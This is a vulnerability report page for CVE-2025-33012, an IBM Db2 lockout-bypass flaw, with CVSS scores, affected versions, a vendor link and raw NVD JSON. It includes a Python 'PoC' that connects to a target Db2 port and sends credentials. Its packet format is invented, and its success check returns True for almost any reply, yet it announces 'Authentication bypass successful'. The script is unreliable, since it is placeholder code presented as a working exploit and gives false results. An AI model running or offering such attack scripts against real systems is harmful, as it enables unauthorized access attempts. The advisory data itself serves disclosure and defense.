Security Vulnerability Report
CVE-2025-33012 CVSS 6.3 MEDIUM

Published: 2025-11-07 19:15:47
Last Modified: 2025-11-19 16:37:54

Description

IBM Db2 10.5.0 through 10.5.11, 11.1.0 through 11.1.4.7, 11.5.0 through 11.5.9, and 12.1.0 through 12.1.3 for Linux could allow an authenticated user to regain access after account lockout due to password use after expiration date.

CVSS Details

CVSS Score: 6.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:ibm:db2:*:*:*:*:*:linux:*:* - VULNERABLE, in these version ranges:
IBM Db2 10.5.0 - 10.5.11 (Linux)
IBM Db2 11.1.0 - 11.1.4.7 (Linux)
IBM Db2 11.5.0 - 11.5.9 (Linux)
IBM Db2 12.1.0 - 12.1.3 (Linux)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-33012 PoC - IBM Db2 Authentication Bypass
# This PoC demonstrates the authentication bypass after account lockout
import socket


def cve_2025_33012_poc():
    """
    PoC for CVE-2025-33012: IBM Db2 authentication bypass after password expiration

    This vulnerability allows authenticated users to regain access after account
    lockout due to password use after expiration date.

    Prerequisites:
    - Valid IBM Db2 user account
    - Account with expired password
    - Network access to IBM Db2 server
    """
    target_host = "TARGET_IP"
    target_port = 50000  # Default IBM Db2 port
    username = "target_user"
    expired_password = "expired_password_123"

    print(f"[*] Attempting to connect to IBM Db2 at {target_host}:{target_port}")

    sock = None  # Defined before the try block so the finally clause is always safe
    # Step 1: Establish connection to Db2 server
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect((target_host, target_port))
        print("[+] Connected to Db2 server")

        # Step 2: Send authentication request with expired password
        # The vulnerability allows bypass of account lockout when using expired password
        auth_packet = create_db2_auth_packet(username, expired_password)
        sock.send(auth_packet)

        # Step 3: Receive and analyze response
        response = sock.recv(1024)

        if is_authentication_successful(response):
            print("[+] Authentication bypass successful - Access granted with expired password")
            print("[+] Account lockout mechanism has been bypassed")
            return True
        else:
            print("[-] Authentication failed - Vulnerability may not be present or already patched")
            return False

    except Exception as e:
        print(f"[-] Error: {str(e)}")
        return False
    finally:
        if sock is not None:
            sock.close()


def create_db2_auth_packet(username, password):
    """Create IBM Db2 authentication packet"""
    # Simplified packet structure for demonstration
    # Actual implementation requires proper Db2 protocol handling
    packet = bytearray()
    packet.extend(username.encode('utf-8'))
    packet.extend(password.encode('utf-8'))
    return packet


def is_authentication_successful(response):
    """Check if authentication was successful"""
    # Response parsing logic for Db2 authentication response
    # Note: this heuristic also returns True for an empty reply or any reply
    # that lacks "sqlcode", so a True result does not confirm the issue.
    return b"sqlcode" not in response or b"0" in response


if __name__ == "__main__":
    print("CVE-2025-33012 IBM Db2 Authentication Bypass PoC")
    print("=" * 50)
    cve_2025_33012_poc()

References

https://www.ibm.com/support/pages/node/7250469 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-33012", "sourceIdentifier": "[email protected]", "published": "2025-11-07T19:15:46.940", "lastModified": "2025-11-19T16:37:54.027", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Db2 10.5.0 through 10.5.11, 11.1.0 through 11.1.4.7, 11.5.0 through 11.5.9, and 12.1.0 through 12.1.3 for Linux could allow an authenticated user to regain access after account lockout due to password use after expiration date."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-324"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:db2:*:*:*:*:*:linux:*:*", "versionStartIncluding": "10.5.0.0", "versionEndIncluding": "10.5.0.11", "matchCriteriaId": "385D4613-C252-4075-8485-55B8E32DC970"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:db2:*:*:*:*:*:linux:*:*", "versionStartIncluding": "11.1.0", "versionEndIncluding": "11.1.4.7", 
"matchCriteriaId": "3B5A9A8A-5EE6-428A-8B3D-543B2F84D615"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:db2:*:*:*:*:*:linux:*:*", "versionStartIncluding": "11.5.0", "versionEndIncluding": "11.5.9", "matchCriteriaId": "ECAF5576-B4A5-4DB7-94F0-942F656F0461"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:db2:*:*:*:*:*:linux:*:*", "versionStartIncluding": "12.1.0", "versionEndIncluding": "12.1.3", "matchCriteriaId": "2AA1764B-CD82-4B33-B85B-27CA2F7C0ED5"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7250469", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}